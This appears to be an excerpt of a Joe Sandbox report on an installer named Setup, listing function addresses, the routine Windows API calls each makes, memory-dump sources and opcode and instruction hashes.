                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Parent
                                                                                              • String ID:
                                                                                              • API String ID: 975332729-0
                                                                                              • Opcode ID: 5d59158ae0a9fe8097e63ecf1a13a16277e82b3a1afb3068eee088f1bc2faa79
                                                                                              • Instruction ID: 52539763d443ab84f74eb5e106c3e3dc09d6f20bac534f21d15184237edc5422
                                                                                              • Opcode Fuzzy Hash: 5d59158ae0a9fe8097e63ecf1a13a16277e82b3a1afb3068eee088f1bc2faa79
                                                                                              • Instruction Fuzzy Hash: ED118B312556129FFB049B78C988A2973FDEB9BB66F140939E056C72A1DB30E841CF61
                                                                                              Function 6C8E2081 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8E2088
                                                                                                • Part of subcall function 6C9178C8: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,6C90139B,?,00000010,6C8D5A14,?,?,?,0000004C,6C90B498,?,?,?), ref: 6C9178D3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionH_prolog3Raise
                                                                                              • String ID:
                                                                                              • API String ID: 741760457-0
                                                                                              • Opcode ID: 898f6d4579c431034ab12709ee1b75226a8e6eb10c5d16646b221351c3e92736
                                                                                              • Instruction ID: 3944dcfd171d814ecba4c451095ec793c439115b28c4d74fe357c3167a87e877
                                                                                              • Opcode Fuzzy Hash: 898f6d4579c431034ab12709ee1b75226a8e6eb10c5d16646b221351c3e92736
                                                                                              • Instruction Fuzzy Hash: 132158B0A0060ACFCB08CF18C6948A9FBF1FF59300725C8ADD4599BB61D730E954CB90
                                                                                              Function 6C9036BA Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 6C9066E5: __EH_prolog3.LIBCMT ref: 6C9066EC
                                                                                                • Part of subcall function 6C9066E5: GetCommandLineW.KERNEL32(00000024,6C9036CF,00000000,?,?,?,?,6C901338,?,00000010,6C8D5A14,?,?,?,0000004C,6C90B498), ref: 6C9066F3
                                                                                                • Part of subcall function 6C9066E5: GetUserDefaultUILanguage.KERNEL32(00000738,00000000,00000000,?,?,?,6C901338,?,00000010,6C8D5A14,?,?,?,0000004C,6C90B498,?), ref: 6C90672F
                                                                                                • Part of subcall function 6C906782: __EH_prolog3.LIBCMT ref: 6C906789
                                                                                                • Part of subcall function 6C906782: CoInitialize.OLE32(00000000), ref: 6C9067DD
                                                                                                • Part of subcall function 6C906782: CoCreateInstance.OLE32(6C8BA974,00000000,00000017,6C8BA9A4,6C8FFA6E,?,?,?,UiInfo.xml,?,00000000,00000044,6C9036D8,02F92298,?,00000000), ref: 6C9067FB
                                                                                              • GetUserDefaultUILanguage.KERNEL32(02F92298,?,00000000,?,?,?,?,6C901338,?,00000010,6C8D5A14,?,?,?,0000004C,6C90B498), ref: 6C9036D8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: DefaultH_prolog3LanguageUser$CommandCreateInitializeInstanceLine
                                                                                              • String ID:
                                                                                              • API String ID: 4049621043-0
                                                                                              • Opcode ID: 0b5211aac069e9f210dd7c039539ec80c7aa87e37ca659f123965cfeb57c1f00
                                                                                              • Instruction ID: f874de9a65ced639959aec223f269cc4d0e1d51c03fb2e04dc473309e721eb20
                                                                                              • Opcode Fuzzy Hash: 0b5211aac069e9f210dd7c039539ec80c7aa87e37ca659f123965cfeb57c1f00
                                                                                              • Instruction Fuzzy Hash: F101C8713016419FE7208A7AC8C0C5A7799EF55679B20833DE5B587BD0E730D8058B51
                                                                                              Function 6395BC2B Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetWindowLongW.USER32(?,000000FC,?), ref: 6395BC91
                                                                                                • Part of subcall function 6394E7D4: GetThreadLocale.KERNEL32(?,?,6394EB27), ref: 6394E7DE
                                                                                                • Part of subcall function 6394E7D4: GetThreadLocale.KERNEL32(?,?,6394EB27), ref: 6394E7ED
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: LocaleThread$LongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2581572359-0
                                                                                              • Opcode ID: b40ed748ecf6813deb73cef3207f75947531f8993c4a4f9be1094c16e4d5680c
                                                                                              • Instruction ID: f8d611e3a2c54e1892f963b2f50246f9da11514a423d5dcc78140296ed60b66e
                                                                                              • Opcode Fuzzy Hash: b40ed748ecf6813deb73cef3207f75947531f8993c4a4f9be1094c16e4d5680c
                                                                                              • Instruction Fuzzy Hash: 7B01C0316042049BCB20DF29C944A6A77FCFF42B78B55C029F8199B261DF30E891CF99
                                                                                              Function 6C8D6083 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3_catch
                                                                                              • String ID:
                                                                                              • API String ID: 3886170330-0
                                                                                              • Opcode ID: 03901dcb28a4ca2e0719defebea893da677f2b33a13274f9e52390936dd5a80b
                                                                                              • Instruction ID: 4daa097063a6a8fd08a9be39887ee3358fcfe91739d04f9bcf784fa428e163d2
                                                                                              • Opcode Fuzzy Hash: 03901dcb28a4ca2e0719defebea893da677f2b33a13274f9e52390936dd5a80b
                                                                                              • Instruction Fuzzy Hash: 2511707610490A8FCB31DF68C58198EB3B5BF94318B164E55D065E7A54CB30F9498B91
                                                                                              Function 6C8CBE52 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 431132790-0
                                                                                              • Opcode ID: d6656485900681210f91dcc19c9882b078d83554b2e973dad03aa76965f7fe19
                                                                                              • Instruction ID: 7129e22bf48f11a42801a1b3f2fa07099b75f6de691c3b90c3ecfd776c2d5d91
                                                                                              • Opcode Fuzzy Hash: d6656485900681210f91dcc19c9882b078d83554b2e973dad03aa76965f7fe19
                                                                                              • Instruction Fuzzy Hash: 80116170A01628EFCF10DFACC98499DBBB9AF08B14B20C959F519DBB54C734DA45CBA1
                                                                                              Function 6C918C9E Relevance: 1.5, APIs: 1, Instructions: 46COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memcpy_s
                                                                                              • String ID:
                                                                                              • API String ID: 2001391462-0
                                                                                              • Opcode ID: 418c8faa8bb17f4116f65aeaec1898627a1780b09b30d3fe84bd4296820e32b2
                                                                                              • Instruction ID: 60535b2e015cfd99a6f1f787c2f3c569c6a68cf390f0c9ca30af86a719efc5ab
                                                                                              • Opcode Fuzzy Hash: 418c8faa8bb17f4116f65aeaec1898627a1780b09b30d3fe84bd4296820e32b2
                                                                                              • Instruction Fuzzy Hash: 6E017C76204208AFC710DF98C885C9AB7F9FF99354711456AF915CB710D770ED04CBA0
                                                                                              Function 6395698A Relevance: 1.5, APIs: 1, Instructions: 34fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ReadFile.KERNELBASE(?,00000000,?,00000000,00000000), ref: 639569B3
                                                                                                • Part of subcall function 63967F08: GetLastError.KERNEL32(63967B0B,?,?,?,00000000), ref: 63967F08
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastRead
                                                                                              • String ID:
                                                                                              • API String ID: 1948546556-0
                                                                                              • Opcode ID: 9f14ac37f1b26b4f11dd408d5429dc8654e03434272dfe2c1e699d2ad78a24d7
                                                                                              • Instruction ID: c7abdf19444caa1335b4a4853358d5c10263ab51fa1d169fd9f1e418a538f196
                                                                                              • Opcode Fuzzy Hash: 9f14ac37f1b26b4f11dd408d5429dc8654e03434272dfe2c1e699d2ad78a24d7
                                                                                              • Instruction Fuzzy Hash: 62F09075210209EFDB08CF55C914B9E77B8EB05B24F005128B8119B290D774EEA4DF11
                                                                                              Function 6C8CA1FF Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3_catch
                                                                                              • String ID:
                                                                                              • API String ID: 3886170330-0
                                                                                              • Opcode ID: 27b67b49406153aab7489690cc46f02ce8bcd7e5b4f868ecb35918c617a0ba08
                                                                                              • Instruction ID: 4eecdf41361743fde0d335dfaa25ea471bce476a6cc7e32e1943c3add897c837
                                                                                              • Opcode Fuzzy Hash: 27b67b49406153aab7489690cc46f02ce8bcd7e5b4f868ecb35918c617a0ba08
                                                                                              • Instruction Fuzzy Hash: D3F04F74B11305EBDB108F68C904B8D3B65BF59354F208558B858DB790CB75DA11CB51
                                                                                              Function 63967F22 Relevance: 1.5, APIs: 1, Instructions: 32fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(00002100,00000002,00000000,63967BC3,C0000000,?,00000000,?,?,63967BC3,?,C0000000,00000000,00000002,00002100,?), ref: 63967F5C
                                                                                                • Part of subcall function 63967E95: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,63967F46,00002100,00000002,00000000,63967BC3,C0000000,?,?,?,63967BC3,?,C0000000,00000000), ref: 63967EA6
                                                                                                • Part of subcall function 63967E95: GetProcAddress.KERNEL32(00000000,CreateFileTransactedW), ref: 63967EB6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressCreateFileHandleModuleProc
                                                                                              • String ID:
                                                                                              • API String ID: 2580138172-0
                                                                                              • Opcode ID: e1e8ebde107738ef023d6b4c81bcafd3e7ea4cb22b25c56d3a931ac620d3ba1e
                                                                                              • Instruction ID: 174fa6cb336c17b3fa39ea5fdb2026373e7c7f9ec83b98acf3a8577cfe91a6c5
                                                                                              • Opcode Fuzzy Hash: e1e8ebde107738ef023d6b4c81bcafd3e7ea4cb22b25c56d3a931ac620d3ba1e
                                                                                              • Instruction Fuzzy Hash: C7F0AF3240525ABBDF029EA4DD00DDA7F6AEF1AB60F048111FA24551A0C332D871AF91
                                                                                              Function 6C8C809D Relevance: 1.5, APIs: 1, Instructions: 32fileCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,?,?,?,00000000,?,00000000,00000001,?,6C8CA9FA,?,80000000,00000001,00000003,00000080,00000000), ref: 6C8C80D7
                                                                                                • Part of subcall function 6C9189E2: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6C8C80C1,?,?,?,?,00000000,?,00000001,?,6C8CA9FA,?,80000000,00000001), ref: 6C9189F3
                                                                                                • Part of subcall function 6C9189E2: GetProcAddress.KERNEL32(00000000,CreateFileTransactedW), ref: 6C918A03
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressCreateFileHandleModuleProc
                                                                                              • String ID:
                                                                                              • API String ID: 2580138172-0
                                                                                              • Opcode ID: 96c37cca06f34cd07e0deda01056a5256ff3a89cc9aee3ddd4309e02e8d4aec9
                                                                                              • Instruction ID: 62257599bb2215fc86b600021e7bab156925659a7269782603d0ab4127ada705
                                                                                              • Opcode Fuzzy Hash: 96c37cca06f34cd07e0deda01056a5256ff3a89cc9aee3ddd4309e02e8d4aec9
                                                                                              • Instruction Fuzzy Hash: ECF09D3214411EBBCF225F95DD019CA3F26AB29324F118512FA2456960C332D571EB92
                                                                                              Function 6C914C0C Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 431132790-0
                                                                                              • Opcode ID: ab2535b4e7fb5c5bf3466f84eca74b6f6d610f4f06452c3544a39e6f7b5e8748
                                                                                              • Instruction ID: 60adb78ede3c37fb34a61ef86a1127dc70249788a10978bbd58d60a1d074df38
                                                                                              • Opcode Fuzzy Hash: ab2535b4e7fb5c5bf3466f84eca74b6f6d610f4f06452c3544a39e6f7b5e8748
                                                                                              • Instruction Fuzzy Hash: A701DDB5600B01AFDB21CF15C581BAABBF1FB58704F108A1DE89A8BB50C334E964DB90
                                                                                              Function 6C8C9E49 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3_catch
                                                                                              • String ID:
                                                                                              • API String ID: 3886170330-0
                                                                                              • Opcode ID: ee4ece6b76f004ac7c98d6b07f48a161d1dfc66a74142a090d970bbcf18908f4
                                                                                              • Instruction ID: 3c3225145f87abaa51621d60ad95916af29c8e1a7a0a8b6bc2b74e798336264f
                                                                                              • Opcode Fuzzy Hash: ee4ece6b76f004ac7c98d6b07f48a161d1dfc66a74142a090d970bbcf18908f4
                                                                                              • Instruction Fuzzy Hash: 48F06230701209DFDB20CF68CA04B9D3BA1AF15758F248198B849EF780CB75EE00CB91
                                                                                              Function 6C912306 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 431132790-0
                                                                                              • Opcode ID: bbdd5373e07cac0dd623098c64aa934f94d6dd81d65bb9374e08578c69162239
                                                                                              • Instruction ID: 71f2ffc06db7e2561ba9214ba3c00486abe0e84e512dfd710c89399b07090aea
                                                                                              • Opcode Fuzzy Hash: bbdd5373e07cac0dd623098c64aa934f94d6dd81d65bb9374e08578c69162239
                                                                                              • Instruction Fuzzy Hash: 8A01DDB5600B01AFD721CF15C941BAABBF1FB58704F108A1DE89A8BB50C334E924DB94
                                                                                              Function 6395507E Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63955085
                                                                                                • Part of subcall function 63952661: __EH_prolog3.LIBCMT ref: 63952668
                                                                                                • Part of subcall function 63952996: __EH_prolog3.LIBCMT ref: 6395299D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 431132790-0
                                                                                              • Opcode ID: dc5f9c20a2e3d8cf83ae3a01fad1d08048742d5575b303fa20787d4a2cb0f74d
                                                                                              • Instruction ID: 899be376134b6c337cb0b72c94038bad364d65ff3bcc60d2f9c82bdf04205129
                                                                                              • Opcode Fuzzy Hash: dc5f9c20a2e3d8cf83ae3a01fad1d08048742d5575b303fa20787d4a2cb0f74d
                                                                                              • Instruction Fuzzy Hash: 4AF03076000709DFCB21CF58C980ACBB7F4BF14B14F00895AE49A9B241D730EA65CFA4
                                                                                              Function 6C8F53E5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 431132790-0
                                                                                              • Opcode ID: f1334064be3cf5c8d75d4c7a9babe441d146d5d3ec71811a12feab8e556a9f17
                                                                                              • Instruction ID: a8325abbfba4eb6b330bdc97447adb195c73cf6d3bfe77f3bfaf326e12bce550
                                                                                              • Opcode Fuzzy Hash: f1334064be3cf5c8d75d4c7a9babe441d146d5d3ec71811a12feab8e556a9f17
                                                                                              • Instruction Fuzzy Hash: D3F0B4319452499ACF218BB8C6003DD77216F2134DF10805484A43BB95C735D61EE7A0
                                                                                              Function 6C8C7C6E Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8C7C75
                                                                                                • Part of subcall function 6C8C7CE8: __EH_prolog3.LIBCMT ref: 6C8C7CEF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 431132790-0
